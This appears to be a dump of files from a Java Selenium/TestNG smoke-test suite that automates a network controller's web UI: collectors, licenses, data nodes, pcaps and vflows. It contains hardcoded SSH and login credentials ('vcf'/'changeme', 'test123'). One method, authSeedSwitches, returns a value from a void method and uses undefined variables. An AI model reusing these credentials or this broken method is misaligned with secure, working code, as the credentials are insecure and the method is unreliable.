(driver.findElements(By.cssSelector(collectorListId)).size() != 0);\n\t\t//List<WebElement> collCount = driver.findElements(By.cssSelector(collectorListId));\n\t\tdriver.manage().timeouts().implicitlyWait(100, TimeUnit.SECONDS);\n\t\tif(exists) {\n\t\t\t List <WebElement> collector = driver.findElements(By.cssSelector(collectorListId));\n\t\t\t for (WebElement row:collector) {\n\t\t\t \tif(row.getText().contains(collName)) {\n\t\t\t \t\tisColl = true;\n\t\t\t \t\tcom.jcabi.log.Logger.info(\"collectorConfigured\",\"Collector List:\"+row.getText());\n\t\t\t \t}\n\t\t\t }\t \n\t\t}\n\t\treturn isColl;\n\t}\n\t\n\tpublic boolean checkCollectorState(WebElement collector) {\n\t \tdriver.manage().timeouts().implicitlyWait(0, TimeUnit.MILLISECONDS);\n\t\t\tboolean existsOn = false;\n\t\t\texistsOn = (collector.findElements(By.cssSelector(switchOnState)).size() != 0);\n\t\t\tdriver.manage().timeouts().implicitlyWait(100, TimeUnit.SECONDS);\n\t\t\treturn existsOn;\t\n\t}\n\t\n\tpublic boolean editCollector(String collName, String switchName) throws Exception{\n\t\tvcfSettingsIcon.click();\n\t\twaitForElementVisibility(collectorMgmtTab,100);\n\t\tcollectorMgmtTab.click();\n\t\twaitForElementVisibility(collectorList,100);\n\t\tboolean status = false;\n\t\tstatus = isCollectorConfigured(collName);\n\t\tif(status) {\n\t\t\tList <WebElement> collList = driver.findElements(By.cssSelector(collectorListId));\n\t\t\tfor (WebElement coll: collList) {\n\t\t\t\tif(coll.getText().contains(collName)) {\n\t\t\t\t\tboolean currentState = checkCollectorState(coll);\n\t\t\t\t\tif(currentState == false) {\n\t\t\t\t\t\tcoll.findElement(By.cssSelector(editIcon)).click();\n\t\t\t\t\t\tswitchDropDown.click();\n\t\t\t\t\t\tList <WebElement> rows = getSwitchList();\n\t\t\t\t\t\tfor (WebElement row : rows) {\n\t\t\t\t\t\t\tif(row.getText().contains(switchName)) {\n\t\t\t\t\t\t\t\trow.click();\n\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t\tretryingFindClick(okButton);\n\t\t\t\t\t\tThread.sleep(10000);\n\t\t\t\t\t\twaitForElementVisibility(driver.findElement(By.cssSelector(toggleSwitch)),100);\n\t\t\t\t\t\tstatus = true;\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t} else {\n\t\t\t\t\t\treturn true; //No need to edit since the collector is already in running state. 
Edit will fail at this point.\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t} \n\t\treturn status;\n\t}\n\t\n\t\n\tpublic boolean toggleCollState(String collName, boolean expState) throws Exception{\n\t\tboolean status = false;\n\t\tboolean currentState = false;\n\t\tdriver.manage().timeouts().implicitlyWait(0, TimeUnit.MILLISECONDS);\n\t\tboolean exists = (driver.findElements(By.cssSelector(collectorListId)).size() != 0);\n\t\tdriver.manage().timeouts().implicitlyWait(100, TimeUnit.SECONDS);\n\t\tif(exists) {\n\t\t\tList <WebElement> collList = driver.findElements(By.cssSelector(collectorListId));\n\t\t\tfor (WebElement coll: collList) {\n\t\t\t\tif(coll.getText().contains(collName)) {\n\t\t\t\t\tcurrentState = checkCollectorState(coll); //find the current state of the switch\n\t\t\t\t\tif(currentState != expState) {\n\t\t\t\t\t\tcoll.findElement(By.cssSelector(toggleSwitch)).click();\n\t\t\t\t\t\twaitForElementVisibility(confirmOkButton,100);\n\t\t\t\t\t\tconfirmOkButton.click();\n\t\t\t\t\t\tThread.sleep(5000); //waiting for the toggle to go through\n\t\t\t\t\t\twaitForElementVisibility(collectorList,100);\n\t\t\t\t\t\twaitForElementToClick(By.cssSelector(collectorListId),100);\n\t\t\t\t\t}\n\t\t\t\t\tif(expState == checkCollectorState(coll)) status = true;\n\t\t\t\t\tbreak; //stop once the named collector has been handled\n\t\t\t\t}\n\t\t\t}\n\t\t} else {\n\t\t\tcom.jcabi.log.Logger.error(\"toggleCollectorState\",\"No collector configured!\");\n\t\t}\n\t\treturn status;\n\t}\n\n\tpublic boolean addCollector(String collName, String switchName, String user, String pwd) {\n\t\tboolean status = false;\n\t\tstatus = isCollectorConfigured(collName);\n\t\tif(status==false) {\n\t\t\ttry {\n\t\t\t\tThread.sleep(5000);\n\t\t\t}catch(Exception e){\n\t\t\t\tSystem.out.println(e.toString());\n\t\t\t}\n\t\t\tList<WebElement> rows = driver.findElements(By.cssSelector(collectorAddButtons));\n\t\t\tfor (WebElement row: rows) {\n\t\t\t\tif(row.getText().contains(collButtonString)) {\n\t\t\t\t\tretryingFindClick(row);\n\t\t\t\t\tbreak; //click the Add Collector button only once\n\t\t\t\t}\n\t\t\t}\n\t\t\tsetValue(name,collName);\n\t\t\twaitForElementVisibility(switchDropDown,1000);\n\t\t\tswitchDropDown.click();\n\t\t\trows = getSwitchList();\n\t\t\tfor (WebElement row : rows) {\n\t\t\t\tif(row.getText().contains(switchName)) {\n\t\t\t\t\trow.click();\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t}\n\t\t\tokButton.click();\n\t\t\twaitForElementVisibility(spanSwitch,100);\n\t\t\twaitForElementToClick(By.cssSelector(toggleSwitch),100);\n\t\t\tstatus = isCollectorConfigured(collName);\n\t\t}\n\t\treturn status;\n\t}\n\tpublic void authSeedSwitches(String usrname, String pwd) throws InterruptedException {\n\t\twaitForElementVisibility(switchList,1000);\n\t\tList<WebElement> rows = new 
ArrayList();\n\t\trows = driver.findElements(By.cssSelector(seedList));\n\t\tString rowTable = null;\n\t for (WebElement row : rows) {\n\t \t if (row.getText().contains(name)) {\n\t\t \t com.jcabi.log.Logger.info(\"verifySeedSwitch\", \"Seed switch found:\"+name);\n\t rowTable = row.getText();\n\t status = true;\n\t break;\n\t }\n\t }\n\t\treturn status;\n\t}\n\n\tpublic void sleepFunc (int sec) throws InterruptedException {\n\t\tThread.sleep(sec*1000);\t\n\t}\t\n\tpublic void addDataNode(String name ,String host, String usrname, String size, String pwd) throws InterruptedException {\n\t\tvcfSettingsIcon.click();\n\t\twaitForElementVisibility(licenseTab,1000);\n\t\tdataNodeTab.click();\n\t\tsleepFunc(1);\n\t\taddButton.click();\n\t\tsetValue(nodeName,name);\n\t\tsetValue(nodeHost,host);\t\n\t\tsetValue(username,usrname);\n\t\tsetValue(password,pwd);\n\t\tsudo.click();\n\t\tsetValue(heapsize,size);\n\t\tokButton.click();\n\t\tsleepFunc(4);\n\t\t\n\t\tList<WebElement> rows = new ArrayList();\n\t\trows = driver.findElements(By.cssSelector(seedList));\n \twhile(rows.size()==1){\n\t\t\tsleepFunc(4);\n\t\t\trows = driver.findElements(By.cssSelector(seedList));\n\t\t}\n\t\twaitForElementVisibility(switchList,100);\n\t\t//closePopUp();\n\t}\n\t\n\tpublic boolean verifyDataNode(String host) {\t\t\n\t\tboolean status = false;\n\t\tList<WebElement> rows = new ArrayList();\n\t\ttry {\n\t\t\tThread.sleep(4000);\n\t\t} catch (InterruptedException e) {\n\t\t\t// TODO Auto-generated catch block\n\t\t\te.printStackTrace();\n\t\t}\n\t\trows = driver.findElements(By.cssSelector(seedList));\n\t\tString rowTable = null;\n\t for (WebElement row : rows) {\n\t if (row.getText().contains(host)) {\n\t rowTable = row.getText();\n\t status = true;\n\t break;\n\t }\n\t }\n\t\treturn status;\n\t}\n\t\n\tpublic boolean installLicenseKey(String licenseKey) throws Exception{\n\t\tvcfSettingsIcon.click();\n\t\twaitForElementVisibility(licenseTab,1000);\n\t\tlicenseTab.click();\n\t\tdriver.findElement(By.cssSelector(instLicKey)).click();\n\t\twaitForElementVisibility(driver.findElement(By.name(\"form\")),100);\n\t\tsetValue(driver.findElement(By.id(\"key\")),licenseKey);\n\t\tokButton.click();\n\t\tThread.sleep(10000);\n\t\treturn true;\n\t}\n\t\n\tpublic void logintoPnc(String usrname, String pwd) throws Exception {\n\t\tvcfSettingsIcon.click();\n\t\twaitForElementVisibility(licenseTab,1000);\n\t\tlicenseTab.click();\n\t\ttry {\n\t\t\tThread.sleep(1000);\n\t\t} catch (InterruptedException e) {\n\t\t\t// TODO Auto-generated catch block\n\t\t\te.printStackTrace();\n\t\t}\n\t\tpncCloudbutton.click();\n\t\tThread.sleep(2000);\n\t\tsetValue(username,usrname);\n\t\tThread.sleep(2000);\n\t\tsetValue(password,pwd);\n\t\tThread.sleep(2000);\n\t\tokButton.click();\n\t\tThread.sleep(2000);\n\t\twaitForElementVisibility(driver.findElement(By.tagName(licenseList)),100);\n\t\twaitForElementToClick(By.tagName(licenseList),100);\n\t}\n\n\tpublic boolean activateLicense(String usrname, String pwd,LicenseTypes type) throws Exception {\n\t boolean status = false;\n\t\tlogintoPnc(usrname , pwd);\n\t Thread.sleep(10000); \n\t //driver.navigate().refresh();\n\t waitForElementVisibility(listLicense,100);\n\t List<WebElement> rows = new ArrayList();\n\t rows = driver.findElements(By.cssSelector(licenseName));\n\t for (int i=0; i < rows.size(); i++) {\n\t\t rows = driver.findElements(By.cssSelector(licenseName));\n\t if (rows.get(i).getText().contains(type.toString())) {\n\t \tcom.jcabi.log.Logger.info(\"activateLicense\", \"License to be 
selected:\"+type.toString());\n\t \tActions actions = new Actions(driver);\n\t \tactions.moveToElement(rows.get(i)).perform();\n\t \tretryingFindClick(rows.get(i),By.cssSelector(licenseActivateButton));\n\t status = true;\n\t Thread.sleep(5000); \n\t break;\n\t }\n\t }\n\t if(status == false) {\n\t \t com.jcabi.log.Logger.error(\"activateLicense\",\"Couldn't find license\"+type.toString()+\" for activation\");\n\t } else {\n\t \t closePopUp();\n\t } \n\t return status;\n\t}\n\t\n\tpublic void closePopUp(){\n\t\tList <WebElement> popout = driver.findElements(By.cssSelector(msgPopup));\n\t\tif (popout.size() > 0) {\n\t\t\tdriver.findElement(By.cssSelector(msgPopup)).click();\n\t\t}\n\t}\n\t\n\tpublic void addAuthServer( String pwd, String basedn, String ldapmgmtdn, String ldapuserdnPatterns, String ldapuserSearchFilter, String ldapmanagerPass) {\n\t\tvcfSettingsIcon.click();\n\t\twaitForElementVisibility(switchMenu,1000);\n\t\tserverMenu.click();\n\t\twaitForElementVisibility(AddAuthServer,1000);\n\t\tAddAuthServer.click();\n\t\tsetValue(baseDn,basedn);\n\t\tsetValue(ldapManagerDn,ldapmgmtdn);\n\t\tsetValue(ldapManagerPass,ldapmanagerPass);\n\t\tsetValue(ldapUserDnPatterns,ldapuserdnPatterns);\n\t\tsetValue(ldapUserSearchFilter,ldapuserSearchFilter);\n\t}\n\t\n\tpublic void navigateToSwitchMenu() {\n\t\tvcfSettingsIcon.click();\n\t\twaitForElementVisibility(switchMenu,1000);\n\t\tswitchMenu.click();\n\t\twaitForElementVisibility(addButton,40);\n\t}\n\t\n\tpublic void navigateToSystemhealthMenu () {\n\t\tvcfSettingsIcon.click();\n\t\twaitForElementVisibility(switchMenu,1000);\n\t\thealthMenu.click();\t\n\t\twaitForElementVisibility(healthDetail,100);\n\t}\n\t\n\tpublic void navigateToServerMenu() {\n\t\tvcfSettingsIcon.click();\n\t\twaitForElementVisibility(switchMenu,1000);\n\t\tserverMenu.click();\n\t\twaitForElementVisibility(AddAuthServer,40);\n\t}\n\t\n\tpublic String navigateToAppMenu() {\n\t\tvcfSettingsIcon.click();\n\t\twaitForElementVisibility(switchMenu,1000);\n\t\tappsMenu.click();\n\t\twaitForElementVisibility(appsDetail,40);\n\t\treturn appsDetail.getText();\n\t}\n\t\n\tpublic String navigateTocertsMenu() {\n\t\tvcfSettingsIcon.click();\n\t\twaitForElementVisibility(switchMenu,1000);\n\t\tcertsMenu.click();\n\t\twaitForElementVisibility(certsDetail,40);\n\t\treturn certsDetail.getText();\n\t}\n\t\n\tpublic void navigateToadminMenu() {\n\t\tvcfSettingsIcon.click();\n\t\twaitForElementVisibility(switchMenu,1000);\n\t\tadminMenu.click();\n\t\twaitForElementVisibility(addAdmin,40);\t\n\t}\n\n}\n"
},
{
"alpha_fraction": 0.7522165179252625,
"alphanum_fraction": 0.7564162611961365,
"avg_line_length": 38.685184478759766,
"blob_id": "ead624d8a388c89af102772828988a1ff1988b89",
"content_id": "9bef179d4a003bc430f8a1c82e00442bbcc0d9b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 2143,
"license_type": "no_license",
"max_line_length": 191,
"num_lines": 54,
"path": "/src/test/java/com/pluribus/vcf/test/PATest.java",
"repo_name": "prangarajan21/VCFC-smoketest-master",
"src_encoding": "UTF-8",
"text": "package com.pluribus.vcf.test;\nimport com.pluribus.vcf.helper.TestSetup;\nimport com.pluribus.vcf.pagefactory.VCFLoginPage;\nimport com.pluribus.vcf.pagefactory.VCFHomePage;\nimport com.pluribus.vcf.pagefactory.VCFPaIndexPage;\nimport org.testng.annotations.BeforeClass;\nimport org.testng.annotations.Optional;\nimport org.testng.annotations.Test;\nimport org.testng.annotations.Parameters;\n\npublic class PATest extends TestSetup{\n\tprivate VCFHomePage home1;\n\tprivate VCFPaIndexPage paIndex;\n\tprivate VCFLoginPage login;\n\t\n\t@BeforeClass(alwaysRun = true)\n\tpublic void init() {\n\t\thome1 = new VCFHomePage(getDriver());\n\t\tlogin = new VCFLoginPage(getDriver());\n\t\tpaIndex = new VCFPaIndexPage(getDriver());\n\t}\n\t\n\t@Parameters({\"password\"}) \n\t@Test(alwaysRun = true)\n\tpublic void logintoPA(@Optional(\"test123\") String password) {\n\t\tlogin.login(\"admin\", password);\n\t\thome1.gotoPA();\n\t}\n\t\n\t@Parameters({\"pcapName\",\"vcfIp\"}) \n\t@Test(groups={\"smoke\",\"regression\"}, dependsOnMethods={\"logintoPA\"}, description=\"Add local Pcap\")\n\tpublic void addPcapTest(String vcfIp,@Optional(\"pcap1\") String pcapName) throws Exception{\n\t\tpaIndex.addLocalPcap(pcapName,vcfIp);\n\t\tif(paIndex.verifyPcap(pcapName)) {\n\t\t\tcom.jcabi.log.Logger.info(\"addPcap\",\"Pcap \"+pcapName+\" configured and verified succcessfully\");\n\t\t} else {\n\t\t\tcom.jcabi.log.Logger.error(\"addPcap\",\"Pcap configuration not successful\");\n\t\t\tthrow new Exception(\"Pcap configuration failed\");\n\t\t}\n\t}\n\t\n\t@Parameters({\"switchName\",\"pcapName\",\"inPort\",\"outPort\",\"flowDuration\",\"flowName\"})\n\t@Test(groups={\"smoke\",\"regression\"},dependsOnMethods={\"addPcapTest\"},description=\"Add vflow\")\n\tpublic void addEnableFlowTest(String switchName, @Optional(\"pcap1\") String pcapName, String inPort, String outPort, String flowDuration, @Optional(\"flow1\") String flowName) throws Exception{\n\t\tpaIndex.addVFlow(flowName,switchName,inPort,outPort,flowDuration,pcapName);\n\t\tif(paIndex.togglevFlowState(flowName)) {\n\t\t\tcom.jcabi.log.Logger.info(\"addVFlowTest\",\"Turned on vflow successfully\");\n\t\t} else {\n\t\t\tcom.jcabi.log.Logger.error(\"addVFlowTest\",\"Could not turn on vflow\");\n\t\t\tthrow new Exception(\"Vflow turn on failed\");\n\t\t}\n\t}\n\t\n}\n"
},
{
"alpha_fraction": 0.7315146923065186,
"alphanum_fraction": 0.7401292324066162,
"avg_line_length": 25.283018112182617,
"blob_id": "54cc72372ec8ca2b8219857a577cd8c173e55aa6",
"content_id": "fe41fd1ca581b47e5eff682b5d2dd00d0b8e332a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 1393,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 53,
"path": "/src/test/java/com/pluribus/vcf/pagefactory/VCFHomePage.java",
"repo_name": "prangarajan21/VCFC-smoketest-master",
"src_encoding": "UTF-8",
"text": "package com.pluribus.vcf.pagefactory;\n\nimport com.pluribus.vcf.helper.PageInfra;\nimport org.openqa.selenium.By;\nimport org.openqa.selenium.WebDriver;\nimport org.openqa.selenium.WebElement;\nimport org.openqa.selenium.support.FindBy;\nimport org.openqa.selenium.support.How;\nimport org.openqa.selenium.support.PageFactory;\nimport org.openqa.selenium.support.ui.ExpectedConditions;\nimport org.openqa.selenium.support.ui.WebDriverWait;\n\npublic class VCFHomePage extends PageInfra{\n\n\t@FindBy(how = How.CSS, using = \"a.fa.fa-cogs\")\n WebElement vcfSettingsIcon;\n\n @FindBy(how = How.CSS, using = \"a.fa.fa-home\")\n WebElement vcfHomeIcon;\n\n @FindBy(how = How.CSS, using = \"div.homelogo.vcf-ia span\")\n\tWebElement vcfIAIcon;\n\t\n\t@FindBy(how = How.CSS, using = \"div.homelogo.vcf-pa span\")\n\tWebElement vcfPAIcon;\n\t\n\t@FindBy(how = How.CSS, using = \"div.homelogo.vcf-mgr span\")\n\tWebElement vcfMgrIcon;\n\t\n\t@FindBy(css = \"a.fa.fa-sign-out\")\n\tWebElement vcfLogout;\n\t\n\tpublic VCFHomePage(WebDriver driver) {\n \tsuper(driver);\n\t}\n\tpublic void waitForHomeLogo() {\n\t\twaitForElementVisibility(vcfIAIcon,100);\n\t}\n\tpublic void gotoIA() {\n\t\twaitForElementVisibility(vcfIAIcon,100);\n\t\tvcfIAIcon.click();\n\t}\t\n\t\t\n\tpublic void gotoPA() {\n\t\twaitForElementVisibility(vcfPAIcon,100);\n\t\tvcfPAIcon.click();\n\t}\n\t\n\tpublic void gotoVCFMgr() {\t\n\t\twaitForElementVisibility(vcfMgrIcon,100);\n\t\tvcfMgrIcon.click();\n\t}\n}\n"
},
{
"alpha_fraction": 0.6955448985099792,
"alphanum_fraction": 0.704866349697113,
"avg_line_length": 28.65447235107422,
"blob_id": "d4a2a2e83f43e6a5b92e1ee3e68adb6a101e604b",
"content_id": "108b615b6d2089fface4f837266cdc0c97d6b694",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 7295,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 246,
"path": "/src/test/java/com/pluribus/vcf/pagefactory/VCFPaIndexPage.java",
"repo_name": "prangarajan21/VCFC-smoketest-master",
"src_encoding": "UTF-8",
"text": "package com.pluribus.vcf.pagefactory;\n\nimport com.jcabi.ssh.SSHByPassword;\nimport com.jcabi.ssh.Shell;\nimport com.pluribus.vcf.helper.PageInfra;\n\nimport java.util.ArrayList;\nimport java.util.List;\nimport java.util.concurrent.TimeUnit;\n\nimport org.openqa.selenium.By;\nimport org.openqa.selenium.WebDriver;\nimport org.openqa.selenium.WebElement;\nimport org.openqa.selenium.support.FindBy;\nimport org.openqa.selenium.support.How;\nimport org.openqa.selenium.support.PageFactory;\nimport org.openqa.selenium.support.ui.ExpectedConditions;\nimport org.openqa.selenium.support.ui.WebDriverWait;\n\npublic class VCFPaIndexPage extends PageInfra {\n\t@FindBy(how = How.CSS, using = \"a.list-group-item.category.pa-dashboard-menu\")\n\tWebElement dashboardIcon;\n\t\n\t@FindBy(how = How.CSS, using = \"a.list-group-item.category.pcap-engine-menu\")\n\tWebElement configIcon;\n\t\n\t@FindBy(how = How.CSS, using = \"a.list-group-item.category.vflow-menu\")\n\tWebElement vFlowConfig;\n\t\n\t@FindBy(how = How.CSS, using = \"div.modal-body\")\n\tWebElement pcapAddMenu;\n\t\n\t@FindBy(how= How.CSS, using = \"button.btn.btn-sm.btn-primary\")\n\tWebElement addButton;\n\t\n\t@FindBy(how= How.CSS, using = \"button.btn.btn-primary.btn-sm\")\n\tWebElement fetchButton;\n\t\n\t@FindBy(how= How.CSS, using = \"button.btn.btn-primary\")\n\tWebElement confirmOkButton;\n\t\n\t@FindBy(how = How.NAME, using = \"name\")\n\tWebElement name;\n\t\t\n\t@FindBy(how = How.NAME, using = \"ip\")\n\tWebElement ip;\n\t\n\t@FindBy(how = How.NAME, using = \"port\")\n\tWebElement port;\n\n\t@FindBy(how = How.NAME, using = \"ok\")\n\tWebElement okButton;\n\t\n\t@FindBy(how = How.ID, using = \"selectedInport\")\n\tWebElement inPortText;\n\t\n\t@FindBy(how = How.ID, using = \"selectedOutport\")\n\tWebElement outPortText;\n\t\n\t@FindBy(how = How.CSS, using = \"div.col-sm-9\")\n\tWebElement interfaceList;\n\t\n\t@FindBy(how = How.CSS, using = \"ng-transclude\")\n\tWebElement pcapList;\n\t\n\t/* Names for findElement(s) methods */\n\tString switchListName = \"ul.dropdown-menu\";\n\tString dropdownName = \"button.btn.btn-default.btn-sm\";\n\tString lblCheckBox = \"label.checkbox\";\n\tString checkBox = \"input.ng-pristine.ng-untouched.ng-valid.ng-empty\";\n\tString pcapNameId = \"div.td span\";\n\tString pcapListId = \"ng-form\";\n\tString flowHeaderId = \"div.panel-heading.mirror-head\";\n\tString flowNameId = \"span.name-ellipsis\";\n\tString toggleSwitch = \"span.switch\";\n\tString switchOnState = \"span.toggle-bg.on\";\n\tString switchOffState = \"span.toggle-bg.off\";\n\t\n\tpublic VCFPaIndexPage(WebDriver driver) {\n\t\tsuper(driver);\n\t}\n\t\n\tpublic List getSwitchList() {\n\t\tList<WebElement> rows = new ArrayList();\n\t\trows = driver.findElements(By.cssSelector(switchListName));\n\t\treturn rows;\n\t}\n\t\n\tpublic List getDropDownButtons() {\n\t\tList<WebElement> rows = new ArrayList();\n\t\trows = driver.findElements(By.cssSelector(dropdownName));\n\t\treturn rows;\n\t}\n\t\n\tpublic String getEth1Ip(String hostIp) {\n\t\tString eth1Ip = null;\n\t\ttry {\n\t\t\tShell sh1 = new Shell.Verbose(\n\t\t\t\t\tnew SSHByPassword(\n\t\t\t\t\t\t\thostIp,\n\t\t\t\t\t\t\t22,\n\t\t\t\t\t\t\t\"vcf\",\n\t\t\t\t\t\t\t\"changeme\"\n\t\t\t\t\t)\n\t );\n\t\t\tString out1 = new Shell.Plain(sh1).exec(\"ifconfig eth1 | grep 'inet addr:' | cut -d: -f2 | awk '{ print $1}'\");\n\t\t\teth1Ip = out1.trim();\n\t\t}\n\t\tcatch(Exception e) {\n\t\t}\n\t\treturn eth1Ip;\n\t}\n\tpublic void addLocalPcap(String pcapName, String hostIp) 
{\n\t\tString eth0Ip = hostIp;\n\t\tString eth1Ip = getEth1Ip(hostIp); \n\t\tconfigIcon.click();\n\t\t\n\t\t//Check if pcap by that name already exists. Then skip adding it. \n\t\tif(!verifyPcap(pcapName)) {\n\t\t\twaitForElementVisibility(addButton,1000);\n\t\t\taddButton.click();\n\t\t\twaitForElementVisibility(pcapAddMenu,100);\n\t\t\tsetValue(name,pcapName);\n\t\t\tsetValue(ip,eth1Ip);\n\t\t\tsetValue(port,\"8080\");\n\t\t\tfetchButton.click();\n\t\t\twaitForElementVisibility(interfaceList,100);\n\t\t\tList <WebElement> ifNames = driver.findElements(By.cssSelector(lblCheckBox));\n\t\t\tint index = 0;\n\t\t\tint hitIdx = 0;\n\t\t\tfor (WebElement row: ifNames) {\n\t\t\t\tif(row.getText().contains(\"eth1\")) {\n\t\t\t\t\trow.findElement(By.cssSelector(checkBox)).click();\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t\tindex++;\n\t\t\t}\n\t\t\tokButton.click();\n\t\t\twaitForElementVisibility(pcapList,100);\n\t\t}\n\t}\n\t\n\tpublic boolean verifyPcap(String pcapName) {\n\t\tboolean status = false; \n\t\tdriver.manage().timeouts().implicitlyWait(0, TimeUnit.MILLISECONDS);\n\t\tboolean exists = (driver.findElements(By.cssSelector(pcapListId)).size() != 0);\n\t\tdriver.manage().timeouts().implicitlyWait(100, TimeUnit.SECONDS);\n\t\tList <WebElement> configuredPcaps = null;\n\t\tif(exists) {\n\t\t\tconfiguredPcaps = driver.findElements(By.cssSelector(pcapNameId));\n\t\t\tfor (WebElement row:configuredPcaps) {\n\t\t\t\tif(row.getText().equalsIgnoreCase(pcapName)) {\n\t\t\t\t\tstatus = true;\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t}\n \t\t}\n\t\treturn status;\n\t}\n\t\n\tpublic void addVFlow(String flowName,String switchName, String inPort, String outPort, String duration, String pcapName) {\n\t\tvFlowConfig.click();\n\t\twaitForElementVisibility(addButton,1000);\n\t\taddButton.click();\n\t\tsetValue(name,flowName);\n\t\tList <WebElement> dds = getDropDownButtons();\n\t\tdds.get(0).click();\n\t\tList <WebElement> rows = getSwitchList();\n\t\tfor (WebElement row : rows) {\n\t\t\tif(row.getText().contains(switchName)) {\n\t\t\t\trow.click();\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\t\tsetValue(inPortText,inPort);\n\t\tsetValue(outPortText,outPort);\n\t\tdds.get(1).click();\n\t\trows = getSwitchList();\n\t\tfor (WebElement row : rows) {\n\t\t\tif(row.getText().contains(duration)) {\n\t\t\t\trow.click();\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\t\tdds.get(2).click();\n\t\trows = getSwitchList();\n\t\tfor (WebElement row : rows) {\n\t\t\tif(row.getText().contains(pcapName)) {\n\t\t\t\trow.click();\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\t\tokButton.click();\n\t}\n\t\n\tpublic boolean chkCurrentFlowState (WebElement flow) {\n\t\tdriver.manage().timeouts().implicitlyWait(0, TimeUnit.MILLISECONDS);\n\t\tboolean existsOn = false;\n\t\texistsOn = (flow.findElements(By.cssSelector(switchOnState)).size() != 0);\n\t\tdriver.manage().timeouts().implicitlyWait(100, TimeUnit.SECONDS);\n\t\treturn existsOn;\t\n\t}\n\t\n\tpublic boolean chkCurrentFlowState (WebElement flow,boolean expState) {\n\t\tboolean status = false;\n\t\tdriver.manage().timeouts().implicitlyWait(0, TimeUnit.MILLISECONDS);\n\t\tboolean existsOn = false;\n\t\texistsOn = (flow.findElements(By.cssSelector(switchOnState)).size() != 0);\n\t\tdriver.manage().timeouts().implicitlyWait(100, TimeUnit.SECONDS);\n\t\tif(existsOn == expState) {\n\t\t\tstatus = true;\n\t\t}\n\t\treturn status;\n\t}\n\t\n\tpublic boolean togglevFlowState(String flowName) {\n\t\tboolean status = false;\n\t\tboolean currentState = false;\n\t\tdriver.manage().timeouts().implicitlyWait(0, 
TimeUnit.MILLISECONDS);\n\t\tboolean exists = (driver.findElements(By.cssSelector(flowHeaderId)).size() != 0);\n\t\tdriver.manage().timeouts().implicitlyWait(100, TimeUnit.SECONDS);\n\t\tif(exists) {\n\t\t\tList <WebElement> flowList = driver.findElements(By.cssSelector(flowHeaderId));\n\t\t\tfor (WebElement flow: flowList) {\n\t\t\t\tif(flow.findElement(By.cssSelector(flowNameId)).getText().contains(flowName)) {\n\t\t\t\t\tcurrentState = chkCurrentFlowState(flow); //findCurrentState of the switch\n\t\t\t\t\tflow.findElement(By.cssSelector(toggleSwitch)).click();\n\t\t\t\t\twaitForElementVisibility(confirmOkButton,100);\n\t\t\t\t\tconfirmOkButton.click();\n\t\t\t\t\tif(chkCurrentFlowState(flow,!currentState)) {\n\t\t\t\t\t\tstatus = true;\n\t\t\t\t\t}\n\t\t\t\t\tbreak;\n\t\t\t\t}\t\t\t\n\t\t\t}\n\t\t} else {\n\t\t\tcom.jcabi.log.Logger.error(\"togglevFlowState\",\"No vflows configured!\");\n\t\t}\n\t\treturn status;\n\t}\n\t\n\tpublic void gotoPADashboard() {\n\t\tdashboardIcon.click();\n\t}\n\n}\n"
},
{
"alpha_fraction": 0.71856290102005,
"alphanum_fraction": 0.71856290102005,
"avg_line_length": 19.875,
"blob_id": "084db193a8c9f55a8ea0ada7587b9d1d7122d397",
"content_id": "085b23f1aa084937541337306ef1d6f97e6e55ca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 167,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 8,
"path": "/src/test/java/com/pluribus/vcf/pagefactory/AuthServerType.java",
"repo_name": "prangarajan21/VCFC-smoketest-master",
"src_encoding": "UTF-8",
"text": "package com.pluribus.vcf.pagefactory;\n\npublic enum AuthServerType {\n\t\n\tLDAP{public String toString(){return \"ldap\";}},\n\tAD{public String toString(){return \"ad\";}},\n\n}\n"
},
{
"alpha_fraction": 0.6550765037536621,
"alphanum_fraction": 0.7176634073257446,
"avg_line_length": 56.52000045776367,
"blob_id": "c51f8f9d0464f90f41ec318bd3140ef93472dd0f",
"content_id": "71973c4ec4c3b15ba14f90a5e40ba4729f1badd5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 1438,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 25,
"path": "/src/test/java/com/pluribus/vcf/pagefactory/LicenseTypes.java",
"repo_name": "prangarajan21/VCFC-smoketest-master",
"src_encoding": "UTF-8",
"text": "package com.pluribus.vcf.pagefactory;\n\npublic enum LicenseTypes {\n\t\n\tVCFC_DEMO_10M{public String toString(){return \"VCFC-DEMO-10M\";}},\n\tVCFC_DEMO_100M{public String toString(){return \"VCFC-DEMO-100M\";}},\n\tVCFC_DEMO_1B{public String toString(){return \"VCFC-DEMO-1B\";}},\n\tVCFC_DEMO_10B{public String toString(){return \"VCFC-DEMO-10B\";}},\n\tVCFIA_DEMO_100M{public String toString(){return \"VCFIA-DEMO-100M\";}},\n\tVCFC_LIC_10M{public String toString(){return \"VCFC-LIC-10M\";}},\n\tVCFC_LIC_100M{public String toString(){return \"VCFC-LIC-100M\";}},\n\tVCFC_LIC_10B{public String toString(){return \"VCFC-LIC-10B\";}},\n\tVCFIA_LIC_100M{public String toString(){return \"VCFIA-LIC-100M\";}},\n\tVCFIA_LIC_1B{public String toString(){return \"VCFIA-LIC-1B\";}},\n\tVCFC_RPRT{public String toString(){return \"VCFC-RPRT\";}},\n\tVCFC_ALRT{public String toString(){return \"VCFC-ALRT\";}},\n\tVCFC_NVM_20PAK{public String toString(){return \"VCFC-NVM-20PAK\";}},\n\tVCFC_SSC_1YR_100M{public String toString(){return \"VCFC-SSC-1YR-100M\";}},\n\tVCFC_SSC_1YR_1B{public String 